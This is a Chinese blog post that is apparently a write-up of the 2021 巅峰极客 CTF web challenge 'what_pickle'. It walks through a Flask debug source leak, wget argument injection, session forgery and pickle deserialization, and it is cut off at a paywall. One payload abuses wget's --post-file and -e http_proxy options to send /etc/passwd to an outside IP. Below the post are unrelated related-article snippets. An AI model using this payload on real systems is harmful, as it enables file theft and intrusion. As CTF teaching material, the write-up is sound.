巅峰极客2021 what_pickle——一道综合性的python web

最新推荐文章于 2025-03-26 23:07:44 发布
原创 最新推荐文章于 2025-03-26 23:07:44 发布 · 772 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #信息安全 #计算机网络

在这里插入图片描述

前言

这题好像是最少人做出的web,考察的知识点比较多,综合性比较强,感觉挺有意思的。很多人都是卡在某个知识点,尤其是最后读flag阶段。总的来说,由于这题涉及到各种很经典的python安全的知识点,挺适合刚接触python安全的初学者学习。

总的来说,流程是这样的。

debug导致部分源码泄露->wget参数注入读源码->session伪造->pickle反序列化->利用proc目录/构造uaf读flag
在这里插入图片描述

分析

信息搜集一波。得到如下几个目录。

[01:33:40] 200 -    2KB - /console
[01:33:50] 500 -   14KB - /home
[01:33:51] 500 -   15KB - /images
[01:33:52] 200 -    1KB - /index
[01:33:56] 405 -  178B  - /login

值得注意的是home目录和images目录的http状态码为500

访问/home和images发现是python3的flask框架,且开了debug模式。那么想到,如果有任意读文件漏洞,可以打flask的pin。所以可以多关注一下任意读。

信息泄露

由于开了debug模式,所以有部分源码泄露。

在访问http://192.168.37.140/images 的时候,可以发现
在这里插入图片描述
这段代码用wget去获取图片,并且还有可以控制的参数。获取到argv参数后,把argv参数作为一个list,其中,给每个argv参数前都添加了-或者—,以防止恶意url的注入。且subprocess.run时,command里面每一个元素都是单独作为一个参数,无法像bash shell那样做命令注入。
在这里插入图片描述

wget参数注入读源码

虽然看似不行,还是有方法的,wget是可以开启代理的。如果开启代理,那么

具体来说有三种开启代理的方式:

  1. 环境变量中设置http_proxy
  2. 在~/.wgetrc里设置http_proxy
  3. 使用-e参数执行wgetrc格式的命令

这里我们可以使用-e http_proxy=http://xxx 来将其指向我们的服务器上。

更多参数的详细信息可以参考

Wgetrc Commands (GNU Wget 1.21.1-dirty Manual)

除此之外,还可以用—post-file来传输文件传输文件。因此,任意文件读的payload就构建好了。如下

192.168.37.140/images?image=index.html&argv=—post-file=/etc/passwd&argv=-e http_proxy=http://1.116.123.136:1234

在这里插入图片描述
接下来读源代码。

/app/app.py

from flask import Flask, request, session, render_template, url_for,redirect
import pickle
import io
import sys
import base64
import random
import subprocess
from ctypes import cdll
from config import SECRET_KEY, notadmin,user

cdll.LoadLibrary("./readflag.so")

app = Flask(__name__)
app.config.update(dict(
    SECRET_KEY=SECRET_KEY,
))

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module in ['config'] and "__" not in name:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
最低0.47元/天 解锁文章
import xlwings时_pickle.UnpicklingError: invalid load key, ‘\x00‘解决方案
weixin_43178406的博客
08-01 5万+
本文主要介绍了import xlwings时_pickle.UnpicklingError: invalid load key, ‘\x00‘解决方案,希望能对学习python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案 2.1 安装软件 2.2 操作方法
Pandas数据持久化秘籍:to_pickle()函数的高效应用与实战技巧
eclipsercp的博客
07-12 1590
函数是Pandas库中用于将Pandas对象(如DataFrame、Series等)序列化并保存到磁盘上的pickle文件中的方法。PicklePython的标准序列化模块,可以将Python对象转换为字节流,以便存储或传输。函数是Pandas库中用于高效序列化Pandas对象到磁盘的重要工具。通过本文的详细解析和实际应用案例,读者应该能够更好地理解如何使用该函数来处理大规模数据集和机器学习模型。然而,也需要注意pickle文件的安全性和兼容性问题,并在必要时考虑使用其他更高效的序列化方法或格式。
极客巅峰2021 web opcode
y0un9er
08-01 1184
pickle 反序列化,过滤R指令的rce
2021 巅峰极客 RE medical_app(结合IDA动调so文件)
__ys的博客
08-02 885
medical_app 因为比赛的时候队友已经做了这一题,所以赛后才看这道。(呜呜呜。。比赛一道逆向没做起,我太菜了 ) 从这道题我主要是学习了一下如何用模拟器结合IDA动调apk中的so文件。 先说一下如何配置 我用的是夜神模拟器7.0.1.3版本 注意: 模拟器要打开USB调试 具体方法如下:打开设置->点击版本号5次进入开发者模式->从开发者选项中找到USB调试勾选上即可 我们首先在模拟器的安装目录下打开cmd,输入下面几行命令 adb connect 127.0.0.1:6200
[python]pickle反序列化漏洞(未完结)
山可行,海可平
03-29 5631
基础知识 实现:pickle或cpickle,二者仅实现语言不同(前纯python,后C),而cPickle性能更好 pickle库 标注库,实现了数据序列化和反序列化 pickle模块是以二进制的形式序列化后保存到文件(后缀:.pkl),不能直接打开 序列化后字符串的表意、序列化的规则->PVM(python序列化和反序列化过程最根本的) PVM 解释字节码的解释引擎 执行流程 PVM将源码编译成字节码 python将编译好的字节码转发到PVM(python虚拟机),PVM循环迭代执行字节码指令
2021巅峰极客逆向medical_app题wp
sln_1550的博客
08-02 588
这题附件是个apk,查看了下dex,解密用的是原生so,直接把so拖入IDA: v3是输入的flag值,ss是加密后的正确值: 先看z4函数: 闻到一股茶的味道; 再看z3和z3函数: 感觉是RC4,等会先验证下: XXTEA的密钥和RC4的密钥都是d: 写脚本解密得到RC4后的flag: 5604b0d49c634d3096cec00593be3b82524b16b28a33b74d6d7b9950c2b10c12e1840a93 然后再解RC4即可得到flag: 这题感觉最简单,不知道为啥
2021巅峰极客逆向so_get_sourcecode题wp
sln_1550的博客
08-02 709
这题乍一看是个web,上传php马以后,可以看到flap.php,但是下载下来却是一堆乱码: 查看容器中运行了nginx和phpfpm,推测是这两个用了插件,对源码进行了加密: 依次查看nginx的php应用和模块,发现有个php_screw_plus.so很可疑。反编译后确认了此模块对文件对php文件解密后进行执行。 在github上也搜到了该项目screw-plus项目源码 下载后编译screw程序,记得要修改成so文件里的密钥,如下图红框位置: 然后运行,对源码目录进行解密: 满怀激动的打开fl
1_notmnist.rar_notMNIST.pickle_tensorflow_tensorflow数据_基于python
09-20
综合以上信息,我们可以了解到,这个压缩包提供了一个预处理过的notMNIST数据集,以pickle格式存储,适合Python和TensorFlow环境使用,尤其适用于机器学习和深度学习初学者进行字母识别的实践。用户可以通过提供的...
md_data——讲义
03-10
"md_data——讲义"这个主题涉及到的是一个与数据处理相关的知识领域,特别是与Markdown(md)格式的数据和 pickle 序列化相关的知识点。Markdown 是一种轻量级的标记语言,常用于编写文档、报告或者讲义,因为它简洁...
2020巅峰极客Web题---Easy Flask
李熠专用博客_白帽子一枚,人称低危终结者。免费收徒,有意者私信!!!
09-28 1915
看标题,猜测改网站用的事Flask框架,搜索引擎一搜,发现Flask存在模板注入漏洞: 于是大概可以推测,题目应该考察的是模板注入漏洞。 打开题目网址,有个登录页面,输入用户名,进入下面的页面: ...
pickle_Pickle Rick CTF撰写
weixin_26722031的博客
07-30 527
pickleThis writeup documents my approach to solving the “Pickle Rick” Capture The Flag (CTF) room available on the TryHackMe platform for free to members. The TryHackMe platform is an excellent place ...
巅峰极客snote
playmaker的博客
11-09 572
巅峰极客snote 链接:https://pan.baidu.com/s/1aAb4JjplV-MBj8iQCauI2Q 提取码:977o 复制这段内容后打开百度网盘手机App,操作更方便哦 查看保护&大致逻辑 是一个选单程序,且保护全开 功能分析 1.add 2.show dword_202014为1,只能泄露一次 3.delete dword_202010只能free一次,且...
巅峰极客(MISC)
weixin_33810006的博客
07-24 514
关于巅峰极客写一下wp吧 毕竟自己那么菜(留给以后的自己看吧QAQ) 这一篇主要是关于杂项的(不简单呀!自己太渣了) 第一题:签到题: 直接打开就可以看到答案:flag{the_greatest_geek} 下面是杂项的内容: warmup 用stegsolve.jar打开图片,Analyse→Data Extract,...
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 1082
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
Python 巅峰教程来了,收藏好,慢慢看
路人甲Java
12-02 419
Python 代码除了基础的操作,数字,字符串,类,装饰器等等,其他就是各种工具要用的数量,numpy, pandas, torch, opencv, multiprocess等,具体看你的研究方向了。不过尽管 Python 上手轻松,但精通却很难。看似语法记得滚瓜烂熟,但一进入实际项目,瞬间被打回了原型。比如这些问题,你能第一时间想到答案吗?Python 中的协程和线程有什么区别?生成器如何进化...
python安全之Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 2783
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
HFCTF-2021-Final-easyflask
LYJ20010728的博客
05-31 1871
HFCTF-2021-Final-easyflask考点思路Payload 考点 Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造 思路 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参
flask学习
最新发布
m0_71902458的博客
03-26 825
在 Flask 中,的methods参数决定了路由支持的 HTTP 方法。是否同时支持POST和GET方法,取决于具体的业务需求。何时单独使用GET或POST,以及何时同时使用两者?GET:当路由用于返回页面内容、提交数据(在网址上)时(如展示一个表单、文章或静态页面)。(会在网址上提交数据):当路由用于从服务器获取数据(如查询信息)时。(1)
Python Flask编写的可以RCE远程命令执行的网页
LaiSC'S Blog
07-24 331
【代码】Python Flask编写的可以RCE远程命令执行的网页。
下载Python库 wikiwho_pickle-1.1.1tar.gz
资源摘要信息:"PyPI官网下载 | wikiwho_pickle-1.1.1.tar.gz" 该资源是一个Python库的压缩包文件,其名称为"wikiwho_pickle-1.1.1.tar.gz"。该资源可以被下载自PyPI官网,即Python Package Index,它是Python社区的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值